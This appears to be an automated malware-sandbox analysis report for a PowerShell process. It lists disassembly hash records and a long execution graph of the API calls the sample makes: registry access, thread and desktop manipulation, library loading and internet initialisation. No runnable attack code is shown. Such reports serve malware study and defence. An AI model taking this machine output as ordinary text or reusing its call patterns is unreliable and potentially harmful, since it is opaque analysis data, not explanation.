                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bb55a3c8c8e1cf141eae2618585ba4c24794f64e18c4992a81ca0e8316fc0c4b
                                                                                                                                        • Instruction ID: 9c67a1ba45939693192052d7d25237e8d0fcb6f048e75bdc9ba6ed5f314d3683
                                                                                                                                        • Opcode Fuzzy Hash: bb55a3c8c8e1cf141eae2618585ba4c24794f64e18c4992a81ca0e8316fc0c4b
                                                                                                                                        • Instruction Fuzzy Hash: 8A212C79740A10DFC764CF5AC890C1ABBF2BF8C2213588A5DE58ACBB61D631F885CB51
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f8587005117af528af173dcad68dd28997b87401f8e7bb20fb9d46f968fb2a1c
                                                                                                                                        • Instruction ID: efd22eaefc7d2265a011e957abd5fc2a562b61f411718ec7373dd138bf3eacd8
                                                                                                                                        • Opcode Fuzzy Hash: f8587005117af528af173dcad68dd28997b87401f8e7bb20fb9d46f968fb2a1c
                                                                                                                                        • Instruction Fuzzy Hash: 18212A78A04609CFCB04DF58C594AAAFBB1FF88310B258599D849E7752C731EC96CBA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 21d900358133c0618556300c5fdfbd6a27c53b0e7e8b2db07c7ffa6c15ec438e
                                                                                                                                        • Instruction ID: 5b29300bde764b23e9b8d780085a5c46dad4c257b0f60b2cb3fb2c071c4c36dc
                                                                                                                                        • Opcode Fuzzy Hash: 21d900358133c0618556300c5fdfbd6a27c53b0e7e8b2db07c7ffa6c15ec438e
                                                                                                                                        • Instruction Fuzzy Hash: F211C135309354DFCB19AB79D855A7E7FA6EFC5202B1404AED44AC7792CE318C02DBA2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b08da63aecc1f2072081e7e8d3766ecb5efedfb058bebb540d1696d12a442e90
                                                                                                                                        • Instruction ID: f69cac06429749830f4249db753f7faedb21b7a2b2e9cbd1767ebd484320be23
                                                                                                                                        • Opcode Fuzzy Hash: b08da63aecc1f2072081e7e8d3766ecb5efedfb058bebb540d1696d12a442e90
                                                                                                                                        • Instruction Fuzzy Hash: 6321B979740A14DFC764DF5AC480D0AB7F2BF8C2213558A5DE98ACBB21DA31F885CB90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6d614fd84947313cce0f6ed5a3dec541be7b5a6838a5a6589df2f92aea7fd82b
                                                                                                                                        • Instruction ID: ef049930bfe0a09a5ee075e452915bc6229df0892ce3ab989ce1624c39e9fc32
                                                                                                                                        • Opcode Fuzzy Hash: 6d614fd84947313cce0f6ed5a3dec541be7b5a6838a5a6589df2f92aea7fd82b
                                                                                                                                        • Instruction Fuzzy Hash: F711A5B53155219FC704DB2CD884C59BBAAFF8972131181AAF509CB761C6B1EC41CBA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_7680000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ce2314421192335da1f2f84b35d0bb8184efa96ec62ad649548571f49acdf1d9
                                                                                                                                        • Instruction ID: cea38471449bb4d6a95d2f53eb1fa49887b38f1b8dc16ce1b932b5172395bf43
                                                                                                                                        • Opcode Fuzzy Hash: ce2314421192335da1f2f84b35d0bb8184efa96ec62ad649548571f49acdf1d9
                                                                                                                                        • Instruction Fuzzy Hash: 81E09270204B159BCA307FAD980818F7E59AFC26B4710172CE2624FBD0CB66A80187E1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2d0ec2398b1c2f48b9121a6432c5c689c1ed3e5432257c93c3b6b781fc280d47
                                                                                                                                        • Instruction ID: ec1cb9e703671f282998e405d09e249f573ef9206512dc7d32a8d91e18b0c02f
                                                                                                                                        • Opcode Fuzzy Hash: 2d0ec2398b1c2f48b9121a6432c5c689c1ed3e5432257c93c3b6b781fc280d47
                                                                                                                                        • Instruction Fuzzy Hash: E1E0D86241A2D9ADCB129BB888055D97FA48A12202B0C41FFDD40C7503E4344694A763
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ba8fa51401e0db0a2fc3fce13fc81b3010981e43c1265ce03de9debdc0fc5d90
                                                                                                                                        • Instruction ID: 755323a9b627356e487fe0c3dad216fe6660561a46300c3c684296d533415afb
                                                                                                                                        • Opcode Fuzzy Hash: ba8fa51401e0db0a2fc3fce13fc81b3010981e43c1265ce03de9debdc0fc5d90
                                                                                                                                        • Instruction Fuzzy Hash: 40E04F762041A1BB8B116A1C98148BF7BAED7C9622318822EF429C3751CB3188519BA0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 795da2dbf2b503a71a57b46f3539fab4a57e1979bd26f106a1d1e7bb989d83f7
                                                                                                                                        • Instruction ID: 08d0e8a6e9659f93a14b20bec3650b411aa2a0724c446b730c49792ee655f603
                                                                                                                                        • Opcode Fuzzy Hash: 795da2dbf2b503a71a57b46f3539fab4a57e1979bd26f106a1d1e7bb989d83f7
                                                                                                                                        • Instruction Fuzzy Hash: 98E0B6B4D0424EDF8F88DFB994411BEFBF4AB08200F00856ED829E3300E6394A018F95
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7edd335a72525ae78122ee6e196a29706f6dfc3ff56d64441dfc0dff4836d04b
                                                                                                                                        • Instruction ID: 0d36db0940b4e46199e08d94bc6bfc06840d3b7ec6236741576eb137656d5ff9
                                                                                                                                        • Opcode Fuzzy Hash: 7edd335a72525ae78122ee6e196a29706f6dfc3ff56d64441dfc0dff4836d04b
                                                                                                                                        • Instruction Fuzzy Hash: D5D09E7044111BDBDF10DF80C61D7AE7B70BB04305F240429D001F5181D7791A94CB91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.2464667672.0000000008820000.00000040.00000800.00020000.00000000.sdmp, Offset: 08820000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_8820000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: qj^$qj^$qj^$qj^$qj^$qj^
                                                                                                                                        • API String ID: 0-2867517424
                                                                                                                                        • Opcode ID: 0418faecb70ef643304fdf29ccf3fb4bba7ca24724d92e303561e9009b68737d
                                                                                                                                        • Instruction ID: 215087bd831aa21dab2b7de9056c8f72ef2b4625b8805bdca89b257ec60606d7
                                                                                                                                        • Opcode Fuzzy Hash: 0418faecb70ef643304fdf29ccf3fb4bba7ca24724d92e303561e9009b68737d
                                                                                                                                        • Instruction Fuzzy Hash: AC31CE0648F3D19FC307433998A80A47FB2AE631A874E51EBC1C4DF4A3E969184BC367

Execution Graph

Execution Coverage: 4.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 5.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 101
101342->101344 101343->101325 101345 1115e4d1 __setlocale_nolock 5 API calls 101344->101345 101346 1105d38f 101345->101346 101346->101325 101348 1105d43c 101347->101348 101353 1105f4e0 101348->101353 101388 110622a0 101348->101388 101391 1105f706 101348->101391 101349 1105d464 101349->101335 101354 1105f557 EnterCriticalSection 101353->101354 101355 1105f590 101354->101355 101410 11141660 101355->101410 101358 1110c4a0 std::locale::_Init 261 API calls 101359 1105f680 101358->101359 101413 1105e890 81 API calls _LangCountryEnumProc@4 101359->101413 101361 1105f6c0 101362 1105f6e7 std::ios_base::_Tidy 101361->101362 101363 1105f827 101361->101363 101364 1105f810 101361->101364 101369 1105f7ac LeaveCriticalSection 101362->101369 101368 1105f86a 101363->101368 101421 1113f670 RegQueryValueExA 101363->101421 101420 110290f0 261 API calls 2 library calls 101364->101420 101370 1105f87f 101368->101370 101386 1105f8af RegSetValueExA 101368->101386 101371 1105f802 101369->101371 101372 1105f7d3 101369->101372 101373 1105f899 RegDeleteValueA 101370->101373 101374 1105f88f 101370->101374 101380 1105f992 101371->101380 101381 1105f95e 101371->101381 101387 1105f97b 101371->101387 101414 11142a60 101372->101414 101373->101362 101374->101373 101377 1105f92a 101423 110290f0 261 API calls 2 library calls 101377->101423 101379 1115e4d1 __setlocale_nolock 5 API calls 101383 1105f9ca 101379->101383 101384 11142a60 std::locale::_Init 21 API calls 101380->101384 101380->101387 101385 11142a60 std::locale::_Init 21 API calls 101381->101385 101381->101387 101383->101349 101384->101387 101385->101387 101386->101362 101386->101377 101387->101379 101456 11060b10 101388->101456 101392 1105f722 _memmove 101391->101392 101486 1105f260 82 API calls 2 library calls 101392->101486 101394 1105f765 101395 1115f3b5 _free 23 API calls 101394->101395 101396 1105f775 std::ios_base::_Tidy 101394->101396 101395->101396 101397 1115f3b5 _free 23 API calls 101396->101397 101398 1105f791 std::ios_base::_Tidy 
101396->101398 101397->101398 101399 1105f7ac LeaveCriticalSection 101398->101399 101400 1105f7d3 101399->101400 101402 1105f802 101399->101402 101401 11142a60 std::locale::_Init 21 API calls 101400->101401 101401->101402 101404 1105f992 101402->101404 101405 1105f95e 101402->101405 101409 1105f97b 101402->101409 101403 1115e4d1 __setlocale_nolock 5 API calls 101406 1105f9ca 101403->101406 101407 11142a60 std::locale::_Init 21 API calls 101404->101407 101404->101409 101408 11142a60 std::locale::_Init 21 API calls 101405->101408 101405->101409 101406->101349 101407->101409 101408->101409 101409->101403 101424 1113ef50 101410->101424 101413->101361 101415 11142a71 101414->101415 101416 11142a6c 101414->101416 101431 11141f60 101415->101431 101434 11141d10 18 API calls std::locale::_Init 101416->101434 101422 1113f69a 101421->101422 101422->101368 101425 1113ef60 101424->101425 101425->101425 101426 1110c4a0 std::locale::_Init 261 API calls 101425->101426 101427 1113ef88 101426->101427 101430 1113ee60 8 API calls 3 library calls 101427->101430 101429 1105f661 101429->101358 101430->101429 101435 11141e10 101431->101435 101433 11141f72 101433->101371 101434->101415 101436 11141e34 101435->101436 101437 11141e39 101435->101437 101455 11141d10 18 API calls std::locale::_Init 101436->101455 101439 11141ea2 101437->101439 101443 11141e42 101437->101443 101440 11141f4e 101439->101440 101441 11141eaf wsprintfA 101439->101441 101444 1115e4d1 __setlocale_nolock 5 API calls 101440->101444 101445 11141ed2 101441->101445 101442 11141e79 101449 1115e4d1 __setlocale_nolock 5 API calls 101442->101449 101443->101442 101446 11141e50 101443->101446 101447 11141f5a 101444->101447 101445->101445 101448 11141ed9 wvsprintfA 101445->101448 101451 1115e4d1 __setlocale_nolock 5 API calls 101446->101451 101447->101433 101454 11141ef4 101448->101454 101450 11141e9e 101449->101450 101450->101433 101452 11141e75 101451->101452 101452->101433 101453 11141f41 OutputDebugStringA 101453->101440 
101454->101453 101454->101454 101455->101437 101457 11060b26 101456->101457 101458 11060b5b 101456->101458 101468 11080b10 101457->101468 101459 1105f4e0 268 API calls 101458->101459 101462 11060b83 101459->101462 101461 11060b2e 101463 11060b37 101461->101463 101464 11060b4e 101461->101464 101462->101349 101472 110290f0 261 API calls 2 library calls 101463->101472 101473 11080c50 101464->101473 101469 11080b1c 101468->101469 101471 11080b21 std::locale::_Init 101468->101471 101483 11080a30 IsDBCSLeadByte 101469->101483 101471->101461 101474 11080c5d 101473->101474 101475 11080c62 101473->101475 101484 11080a30 IsDBCSLeadByte 101474->101484 101477 11080c6b 101475->101477 101482 11080c7f 101475->101482 101485 11160e4e 81 API calls 3 library calls 101477->101485 101479 11080c78 101479->101458 101480 11080ce3 101480->101458 101481 11161f66 81 API calls std::locale::_Init 101481->101482 101482->101480 101482->101481 101483->101471 101484->101475 101485->101479 101486->101394 101487 11030444 GetModuleHandleA GetProcAddress 101488 11030461 GetNativeSystemInfo 101487->101488 101489 1103046d 101487->101489 101488->101489 101490 1103040d 101489->101490 101494 110304d1 101489->101494 101503 11030430 GetStockObject GetObjectA 101490->101503 101555 1110c420 101490->101555 101497 1110c420 std::locale::_Init 261 API calls 101494->101497 101496 11030696 SetErrorMode SetErrorMode 101500 1110c420 std::locale::_Init 261 API calls 101496->101500 101499 110304d8 101497->101499 101693 110f8130 268 API calls std::locale::_Init 101499->101693 101501 110306d2 101500->101501 101606 11027fe0 101501->101606 101503->101496 101505 110306ec 101506 1110c420 std::locale::_Init 261 API calls 101505->101506 101507 11030712 101506->101507 101508 11027fe0 264 API calls 101507->101508 101509 1103072b InterlockedExchange 101508->101509 101511 1110c420 std::locale::_Init 261 API calls 101509->101511 101512 11030753 101511->101512 101609 11089840 101512->101609 101514 1103076b GetACP 101620 1115f8a3 
101514->101620 101519 1103079c 101663 1113f220 101519->101663 101522 1110c420 std::locale::_Init 261 API calls 101523 110307e8 101522->101523 101556 1110c43e 101555->101556 101557 1110c447 wsprintfA 101556->101557 101559 1110c473 _memset 101556->101559 101709 110290f0 261 API calls 2 library calls 101557->101709 101561 1115e4d1 __setlocale_nolock 5 API calls 101559->101561 101562 11030414 101561->101562 101563 11105d40 101562->101563 101564 1110c420 std::locale::_Init 261 API calls 101563->101564 101565 11105da1 101564->101565 101566 11105db9 OpenEventA 101565->101566 101710 111042a0 101565->101710 101569 11105ee1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 101566->101569 101570 11105e28 CloseHandle GetSystemDirectoryA 101566->101570 101572 1110c420 std::locale::_Init 261 API calls 101569->101572 101571 11105e48 101570->101571 101571->101571 101573 11105e50 LoadLibraryA 101571->101573 101574 11105f33 101572->101574 101573->101569 101576 11105e81 101573->101576 101575 11105f4c 101574->101575 101778 110f23a0 264 API calls std::locale::_Init 101574->101778 101729 1110c2b0 101575->101729 101745 11141710 101576->101745 101580 11105e8b 101582 11105e92 GetProcAddress 101580->101582 101583 11105eaa GetProcAddress 101580->101583 101582->101583 101585 11105ed4 FreeLibrary 101583->101585 101586 11105ec6 101583->101586 101585->101569 101586->101569 101588 11106015 101589 1115e4d1 __setlocale_nolock 5 API calls 101588->101589 101591 1110602f 101589->101591 101590 1110c420 std::locale::_Init 261 API calls 101592 11105f83 101590->101592 101591->101503 101593 11105f94 101592->101593 101594 11105f9d 101592->101594 101779 110f23a0 264 API calls std::locale::_Init 101593->101779 101596 1110c2b0 420 API calls 101594->101596 101597 11105fb9 CloseHandle 101596->101597 101598 11141710 std::locale::_Init 86 API calls 101597->101598 101599 11105fca 101598->101599 101599->101588 101600 1110c420 std::locale::_Init 261 API calls 101599->101600 101601 11105fd8 
101600->101601 101602 11105ff2 101601->101602 101780 110f23a0 264 API calls std::locale::_Init 101601->101780 101604 1110c2b0 420 API calls 101602->101604 101605 1110600e CloseHandle 101604->101605 101605->101588 101607 110879a0 264 API calls 101606->101607 101608 11027feb _memset 101607->101608 101608->101505 101610 1110c420 std::locale::_Init 261 API calls 101609->101610 101611 11089877 101610->101611 101612 11089899 InitializeCriticalSection 101611->101612 101613 1110c420 std::locale::_Init 261 API calls 101611->101613 101615 110898fa 101612->101615 101616 11089892 101613->101616 101615->101514 101616->101612 102185 1115e96a 34 API calls std::exception::_Copy_str 101616->102185 101618 110898c9 102186 1115edc1 RaiseException 101618->102186 101621 1115f8d6 101620->101621 101622 1115f8c1 101620->101622 101621->101622 101624 1115f8dd 101621->101624 102187 11165abf 23 API calls __getptd_noexit 101622->102187 102189 1116bbed 96 API calls 9 library calls 101624->102189 101625 1115f8c6 102188 1116a6d4 11 API calls _fputs 101625->102188 101628 1115f903 101629 11030792 101628->101629 102190 1116b9f4 93 API calls 7 library calls 101628->102190 101631 11161c63 101629->101631 101632 11161c6f _fputs 101631->101632 101633 11161c90 101632->101633 101634 11161c79 101632->101634 101635 11167f85 __getptd 62 API calls 101633->101635 102216 11165abf 23 API calls __getptd_noexit 101634->102216 101637 11161c95 101635->101637 101639 1116cc78 _setlocale 70 API calls 101637->101639 101638 11161c7e 102217 1116a6d4 11 API calls _fputs 101638->102217 101641 11161c9f 101639->101641 101642 1116658e __calloc_crt 23 API calls 101641->101642 101644 11161cb5 101642->101644 101643 11161c89 _setlocale _fputs 101643->101519 101644->101643 102191 111610d4 101644->102191 102352 1113f130 101663->102352 101665 1113f130 IsDBCSLeadByte 101667 1113f235 101665->101667 101666 11161f66 81 API calls std::locale::_Init 101666->101667 101667->101665 101667->101666 101668 110307c8 101667->101668 101668->101522 
101693->101503 101781 1110c520 101710->101781 101713 1110c520 3 API calls 101714 111042ec 101713->101714 101715 1110c520 3 API calls 101714->101715 101716 111042fe 101715->101716 101717 1110c520 3 API calls 101716->101717 101718 1110430f 101717->101718 101719 1110c520 3 API calls 101718->101719 101720 11104320 101719->101720 101721 1110c420 std::locale::_Init 261 API calls 101720->101721 101722 11104331 101721->101722 101723 1110441a 101722->101723 101724 1110433c LoadLibraryA LoadLibraryA 101722->101724 101788 1115e96a 34 API calls std::exception::_Copy_str 101723->101788 101724->101566 101726 11104429 101789 1115edc1 RaiseException 101726->101789 101728 1110443e 101730 1110c2d0 CreateThread 101729->101730 101731 1110c2bf CreateEventA 101729->101731 101733 1110c2f6 101730->101733 101734 1110c30d 101730->101734 101793 1110cd70 101730->101793 101807 11026ee0 101730->101807 101832 1102c030 101730->101832 101867 110ffe60 101730->101867 101731->101730 101792 110290f0 261 API calls 2 library calls 101733->101792 101736 1110c311 WaitForSingleObject CloseHandle 101734->101736 101737 11105f68 CloseHandle 101734->101737 101736->101737 101739 1109dcf0 101737->101739 101740 1109dcff GetCurrentProcess OpenProcessToken 101739->101740 101741 1109dd3d 101739->101741 101740->101741 101742 1109dd22 101740->101742 101741->101588 101741->101590 102154 1109dc20 101742->102154 101744 1109dd2b CloseHandle 101744->101741 101746 11141731 GetVersionExA 101745->101746 101755 1114190c 101745->101755 101748 11141753 101746->101748 101746->101755 101747 11141915 101750 1115e4d1 __setlocale_nolock 5 API calls 101747->101750 101749 11141760 RegOpenKeyExA 101748->101749 101748->101755 101751 1114178d _memset 101749->101751 101749->101755 101752 11141922 101750->101752 101757 1113f670 std::locale::_Init RegQueryValueExA 101751->101757 101752->101580 101753 11141974 101754 1115e4d1 __setlocale_nolock 5 API calls 101753->101754 101756 11141984 101754->101756 101755->101747 101755->101753 102172 
11080d00 101755->102172 101756->101580 101758 111417cf 101757->101758 101760 1113f670 std::locale::_Init RegQueryValueExA 101758->101760 101762 111417f9 101760->101762 101761 1114195c 101761->101747 101764 1115f5b7 std::locale::_Init 75 API calls 101761->101764 101763 111418ff RegCloseKey 101762->101763 101765 1115f5b7 std::locale::_Init 75 API calls 101762->101765 101763->101755 101766 1114196d 101764->101766 101767 1114180e 101765->101767 101766->101747 101766->101753 102167 111601fd 101767->102167 101769 11141836 101771 1115f5b7 std::locale::_Init 75 API calls 101769->101771 101770 111601fd std::locale::_Init 75 API calls 101772 1114181d 101770->101772 101774 11141842 _strncpy 101771->101774 101772->101769 101772->101770 101773 111418e1 101773->101763 101774->101773 101775 1113f670 std::locale::_Init RegQueryValueExA 101774->101775 101776 111418b8 101775->101776 101777 1113f670 std::locale::_Init RegQueryValueExA 101776->101777 101777->101773 101778->101575 101779->101594 101780->101602 101782 1110c536 CreateEventA 101781->101782 101783 1110c549 101781->101783 101782->101783 101784 1110c557 101783->101784 101790 1110c260 InterlockedIncrement 101783->101790 101786 111042dc 101784->101786 101791 1110c3c0 InterlockedIncrement 101784->101791 101786->101713 101788->101726 101789->101728 101790->101784 101791->101786 101889 110b6cd0 101793->101889 101795 1110cd7e GetCurrentThreadId 101891 1110c340 101795->101891 101797 1110ce10 101898 1110c370 SetEvent PulseEvent 101797->101898 101799 1110cdb0 WaitForSingleObject 101896 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 101799->101896 101800 1110ce1a 101802 1110cd99 std::ios_base::_Tidy 101802->101797 101802->101799 101803 1110cdd3 101802->101803 101897 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 101802->101897 101804 1110cde3 PostMessageA 101803->101804 101805 1110cde8 PostThreadMessageA 101803->101805 101804->101802 
101805->101802 101808 11026f12 101807->101808 101900 110883c0 101808->101900 101811 1110c420 std::locale::_Init 261 API calls 101812 11026f36 101811->101812 101813 11026f57 101812->101813 101905 1110d060 101812->101905 101815 1110c340 262 API calls 101813->101815 101821 11026f6f 101815->101821 101816 11026f86 WaitForMultipleObjects 101817 11026f9d 101816->101817 101816->101821 101818 11026fa6 PostMessageA 101817->101818 101819 11026fba SetEvent Sleep 101817->101819 101818->101819 101818->101821 101819->101821 101820 11027064 101822 1102707e CloseHandle 101820->101822 101934 1110cc00 274 API calls 2 library calls 101820->101934 101821->101816 101821->101820 101823 11026fe5 PostMessageA 101821->101823 101829 1102702a GetCurrentThreadId GetThreadDesktop 101821->101829 101933 11026ec0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 101821->101933 101935 1110c370 SetEvent PulseEvent 101822->101935 101823->101821 101827 11027093 101828 11027075 std::ios_base::_Tidy 101828->101822 101829->101821 101830 11027039 SetThreadDesktop 101829->101830 101830->101821 101831 11027044 CloseDesktop 101830->101831 101831->101821 101833 1102c062 101832->101833 101834 1110c340 262 API calls 101833->101834 101835 1102c06f WaitForSingleObject 101834->101835 101836 1102c086 101835->101836 101837 1102c29d 101835->101837 101838 1102c090 GetTickCount 101836->101838 101839 1102c286 WaitForSingleObject 101836->101839 102023 1110c370 SetEvent PulseEvent 101837->102023 101939 110cf410 101838->101939 101839->101836 101839->101837 101842 1102c2a4 CloseHandle 102024 1110c580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 101842->102024 101843 1102c0a6 101845 110cf410 264 API calls 101843->101845 101848 1102c2d4 101843->101848 101850 1102c2e8 101843->101850 101852 1102c2fc 101843->101852 101857 1102c194 GetTickCount 101843->101857 101949 110ce440 101843->101949 101961 11029230 LoadLibraryA 101843->101961 102012 110cf0a0 265 API calls 2 library calls 
101843->102012 101845->101843 101846 1102c2b5 std::ios_base::_Tidy 102025 110290f0 261 API calls 2 library calls 101848->102025 102026 110290f0 261 API calls 2 library calls 101850->102026 102027 110290f0 261 API calls 2 library calls 101852->102027 101855 1102c310 101866 1102c191 std::ios_base::_Tidy 101857->101866 101859 11142a60 std::locale::_Init 21 API calls 101859->101866 101861 110ce4f0 261 API calls 101861->101866 101862 1113e8f0 std::locale::_Init 261 API calls 101862->101866 101864 11066f60 294 API calls 101864->101866 101866->101848 101866->101850 101866->101855 101866->101857 101866->101859 101866->101861 101866->101862 101866->101864 102013 11041cc0 263 API calls 2 library calls 101866->102013 102014 110ce4f0 101866->102014 101868 110883c0 5 API calls 101867->101868 101869 110ffe6d 101868->101869 101870 110ffe79 GetCurrentThreadId GetThreadDesktop OpenDesktopA 101869->101870 101871 110ffedf GetLastError 101870->101871 101872 110ffe9f SetThreadDesktop 101870->101872 101875 11142a60 std::locale::_Init 21 API calls 101871->101875 101873 110ffeaa 101872->101873 101874 110ffec1 GetLastError 101872->101874 101876 11142a60 std::locale::_Init 21 API calls 101873->101876 101877 11142a60 std::locale::_Init 21 API calls 101874->101877 101878 110ffef1 101875->101878 101879 110ffeb5 CloseDesktop 101876->101879 101880 110ffed3 CloseDesktop 101877->101880 102126 110ffde0 101878->102126 101879->101878 101880->101878 101882 110ffefb 101883 1110c340 262 API calls 101882->101883 101884 110fff02 101883->101884 102132 110f2460 16 API calls 101884->102132 101886 110fff09 102133 1110c370 SetEvent PulseEvent 101886->102133 101888 110fff10 std::ios_base::_Tidy 101890 110b6cd8 std::locale::_Init 101889->101890 101890->101795 101892 1110c360 SetEvent 101891->101892 101893 1110c349 101891->101893 101892->101802 101899 110290f0 261 API calls 2 library calls 101893->101899 101896->101802 101897->101802 101898->101800 101901 1110c650 4 API calls 101900->101901 101902 110883d0 
101901->101902 101903 11026f19 CreateEventA 101902->101903 101904 110883e2 UnhookWindowsHookEx 101902->101904 101903->101811 101904->101903 101906 1110c420 std::locale::_Init 261 API calls 101905->101906 101907 1110d091 101906->101907 101908 1110d0b3 GetCurrentThreadId InitializeCriticalSection 101907->101908 101909 1110c420 std::locale::_Init 261 API calls 101907->101909 101912 1110d120 EnterCriticalSection 101908->101912 101913 1110d113 InitializeCriticalSection 101908->101913 101911 1110d0ac 101909->101911 101911->101908 101936 1115e96a 34 API calls std::exception::_Copy_str 101911->101936 101914 1110d1da LeaveCriticalSection 101912->101914 101915 1110d14e CreateEventA 101912->101915 101913->101912 101914->101813 101917 1110d161 101915->101917 101918 1110d178 101915->101918 101938 110290f0 261 API calls 2 library calls 101917->101938 101919 1110c420 std::locale::_Init 261 API calls 101918->101919 101923 1110d17f 101919->101923 101920 1110d0cf 101937 1115edc1 RaiseException 101920->101937 101925 1110d19c 101923->101925 101926 1110d060 414 API calls 101923->101926 101927 1110c420 std::locale::_Init 261 API calls 101925->101927 101926->101925 101928 1110d1ac 101927->101928 101929 1110d1bd 101928->101929 101930 1110c520 3 API calls 101928->101930 101931 1110c2b0 414 API calls 101929->101931 101930->101929 101932 1110d1d5 101931->101932 101932->101914 101933->101821 101934->101828 101935->101827 101936->101920 101937->101908 102029 110cf1b0 101939->102029 101942 110cf45b 101945 110cf475 101942->101945 101946 110cf458 101942->101946 101943 110cf444 102043 110290f0 261 API calls 2 library calls 101943->102043 101945->101843 101946->101942 102044 110290f0 261 API calls 2 library calls 101946->102044 101950 110ce454 101949->101950 101951 11161dd7 __strdup 34 API calls 101950->101951 101973 110292c1 std::ios_base::_Tidy 101961->101973 101962 110292f3 GetProcAddress 101962->101973 101964 110293e8 InternetOpenA 101964->101973 101965 110293cf GetProcAddress 101965->101964 
